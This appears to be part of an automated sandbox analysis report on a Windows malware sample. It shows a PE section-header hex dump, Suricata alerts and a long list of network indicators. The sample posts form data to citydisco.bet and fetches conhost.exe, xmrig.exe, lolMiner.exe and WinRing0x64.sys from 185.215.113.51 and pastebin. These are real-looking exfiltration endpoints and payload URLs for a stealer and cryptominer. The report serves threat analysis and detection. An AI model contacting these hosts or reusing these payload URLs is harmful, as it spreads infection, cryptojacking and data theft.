00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 19 74 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c e0 ae 00 40 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 0a 5f 00 00 10 00 00 00 10 5f 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 64 61 74 61 00 00 00 60 04 01 00 00 20 5f 00 00 06 01 00 00 20 5f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 e0 dc 15 00 00 30 60 00 00 de 15 00 00 26 60 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 70 64 61 74 61 00 00 9c ee 02 00 00 10 76 00 00 f0 02 00 00 04 76 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 78 64 61 74 61 00 00 14 b9 03 00 00 00 79 00 00 ba 03 00 00 f4 78 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 73 73 00 00 00 00 e0 0a 32 00 00 c0 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 69 64 61 74 61 00 00 d8 46 00 00 00 d0 ae 00 00 48 00 00 00 ae 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 68 00 00 00 00 20 af 00 00 02 00 00 00 f6 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 30 af 00 00 02 00 00 00 f8 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 5c 00 00 00 40 af 00 e8 5c 00 00 00 fa 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 6c 8e 00 00 00 a0 af 00 00 90 00 00 00 58 7d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /raw/YpJeSRBC HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /conhost.exe HTTP/1.1Connection: Keep-AliveHost: 185.215.113.51
Source: global traffic HTTP traffic detected: GET /xmrig.exe HTTP/1.1Host: 185.215.113.51Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /WinRing0x64.sys HTTP/1.1Host: 185.215.113.51Connection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 172.67.19.24 172.67.19.24
Source: Joe Sandbox View IP Address: 172.67.19.24 172.67.19.24
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49684 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49692 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49690 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49688 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49682 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49691 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49694 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2829056 - Severity 2 - ETPRO MALWARE Observed Request for xmrig.exe in - Coinminer Download : 192.168.2.8:49701 -> 185.215.113.51:80
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 59Host: citydisco.bet
Source: global traffic HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PF7T3HoaLds6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 14499Host: citydisco.bet
Source: global traffic HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6XEyhosNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15025Host: citydisco.bet
Source: global traffic HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SHu2usqr78969User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20219Host: citydisco.bet
Source: global traffic HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=n1eA4K8BqyRYg06s7EMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2455Host: citydisco.bet
Source: global traffic HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=82suKX2btIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 552658Host: citydisco.bet
Source: global traffic HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 97Host: citydisco.bet
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: global traffic HTTP traffic detected: GET /raw/YpJeSRBC HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /conhost.exe HTTP/1.1Connection: Keep-AliveHost: 185.215.113.51
Source: global traffic HTTP traffic detected: GET /xmrig.exe HTTP/1.1Host: 185.215.113.51Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /WinRing0x64.sys HTTP/1.1Host: 185.215.113.51Connection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: citydisco.bet
Source: global traffic DNS traffic detected: DNS query: pastebin.com
Source: unknown HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 59Host: citydisco.bet
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Mar 2025 12:34:01 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-frame-options: DENYx-frame-options: DENYx-content-type-options: nosniffx-content-type-options: nosniffx-xss-protection: 1;mode=blockx-xss-protection: 1;mode=blockcache-control: public, max-age=1801CF-Cache-Status: EXPIREDServer: cloudflareCF-RAY: 91fb902648ca22c3-ORD
Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.00000000030BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.51
Source: setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256196112.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.51/
Source: setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256196112.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.51/C
Source: setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256196112.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.51/D
Source: setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256196112.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.51/J
Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000002F91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.51/WatchDog.exe
Source: setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000000.1215296075.0000000000D32000.00000002.00000001.01000000.00000008.sdmp, ZHKYZWVTC38PGAWGZF49K.exe.2.dr String found in binary or memory: http://185.215.113.51/WatchDog.exeEhttp://185.215.113.51/lolMiner.exe?http://185.215.113.51/xmrig.ex
Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.00000000030D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.51/WatchDog.exeP
Source: setupx 1.exe1.exe, 00000002.00000003.1308460293.000000000386A000.00000004.00000800.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2258316500.000000000386C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.51/WatchDogee
Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000002F91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.51/WinRing0x64.sys
Source: setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256621404.0000000000FEE000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308250372.0000000000FED000.00000004.00000020.00020000.00000000.sdmp, ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000000.1215296075.0000000000D32000.00000002.00000001.01000000.00000008.sdmp, ZHKYZWVTC38PGAWGZF49K.exe.2.dr String found in binary or memory: http://185.215.113.51/WinRing0x64.sysChttps://pastebin.com/raw/YpJeSRBC
Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.00000000030D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.51/WinRing0x64.sysP
Source: setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308909879.0000000000FCD000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256465217.0000000000FCE000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256041446.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308487060.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2255217438.0000000000ECB000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.51/conhost.exe
Source: setupx 1.exe1.exe, 00000002.00000002.2256041446.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308487060.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.51/conhost.exe:
Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000002F91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.51/lolMiner.exe
Source: setupx 1.exe1.exe, 00000002.00000002.2256621404.0000000000FEE000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308250372.0000000000FED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.51/lolMiner.exe?http://185.215.113.51/xmrig.exe
Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000002F91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.51/xmrig.exe
Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.00000000030BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.51/xmrig.exeP
Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.00000000030D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.51D
Source: setupx 1.exe1.exe, 00000002.00000003.1082733227.00000000037E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: setupx 1.exe1.exe, 00000002.00000003.1082733227.00000000037E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.000000000317A000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.10.dr String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.000000000317A000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.10.dr String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.000000000317A000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.10.dr String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.000000000317A000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.10.dr String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: powershell.exe, 0000000D.00000002.1238344010.0000000003057000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.mi
Source: setupx 1.exe1.exe, 00000002.00000003.1082733227.00000000037E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: setupx 1.exe1.exe, 00000002.00000003.1082733227.00000000037E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: setupx 1.exe1.exe, 00000002.00000003.1082733227.00000000037E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: setupx 1.exe1.exe, 00000002.00000003.1082733227.00000000037E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: setupx 1.exe1.exe, 00000002.00000003.1082733227.00000000037E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: powershell.exe, 0000000D.00000002.1243414678.0000000005EF9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: setupx 1.exe1.exe, 00000002.00000003.1082733227.00000000037E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: setupx 1.exe1.exe, 00000002.00000003.1082733227.00000000037E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000003078000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pastebin.com
Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000003078000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pastebin.comd
Source: powershell.exe, 0000000D.00000002.1239270589.0000000004FE6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000D.00000002.1239270589.0000000004FE6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000003064000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1239270589.0000000004E91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000D.00000002.1239270589.0000000004FE6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: Amcache.hve.6.dr String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 0000000D.00000002.1239270589.0000000004FE6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: setupx 1.exe1.exe, 00000002.00000003.1082733227.00000000037E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: setupx 1.exe1.exe, 00000002.00000003.1082733227.00000000037E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org?q=
Source: powershell.exe, 0000000D.00000002.1239270589.0000000004E91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lBLr
Source: setupx 1.exe1.exe, 00000002.00000003.1108930145.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1109422198.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
Source: setupx 1.exe1.exe, 00000002.00000003.1108930145.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1109422198.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
Source: setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: setupx 1.exe1.exe, 00000002.00000003.1152775702.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1109274613.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1081894496.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308962927.0000000000FC7000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1108659728.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1113377940.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256196112.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1182650520.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1139527382.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256410561.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1139805381.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1182053990.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1113252451.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://citydisco.bet/
Source: setupx 1.exe1.exe, 00000002.00000003.1152775702.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1182053990.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://citydisco.bet/D
Source: setupx 1.exe1.exe, 00000002.00000003.1108659728.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://citydisco.bet/Vs16c
Source: setupx 1.exe1.exe, 00000002.00000003.1082401555.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1139485056.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1108659728.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1108930145.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1113252451.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1139728518.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2255908312.0000000000F77000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1081894496.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1154406299.0000000000F77000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1109274613.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://citydisco.bet/gdJIS
Source: setupx 1.exe1.exe, 00000002.00000002.2256041446.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308487060.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://citydisco.bet/gdJIS6
Source: setupx 1.exe1.exe, 00000002.00000003.1082401555.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1081894496.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://citydisco.bet/gdJISAAIA
Source: setupx 1.exe1.exe, 00000002.00000003.1082401555.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1108659728.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1113252451.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1081894496.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1109274613.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://citydisco.bet/gdJISre
Source: setupx 1.exe1.exe, 00000002.00000003.1081790283.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://citydisco.bet:443/gdJIS
Source: setupx 1.exe1.exe, 00000002.00000003.1108930145.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://citydisco.bet:443/gdJIS71025-5-
Source: setupx 1.exe1.exe, 00000002.00000003.1108930145.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1109422198.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: setupx 1.exe1.exe, 00000002.00000003.1108930145.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1109422198.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: powershell.exe, 0000000D.00000002.1243414678.0000000005EF9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.1243414678.0000000005EF9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.1243414678.0000000005EF9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
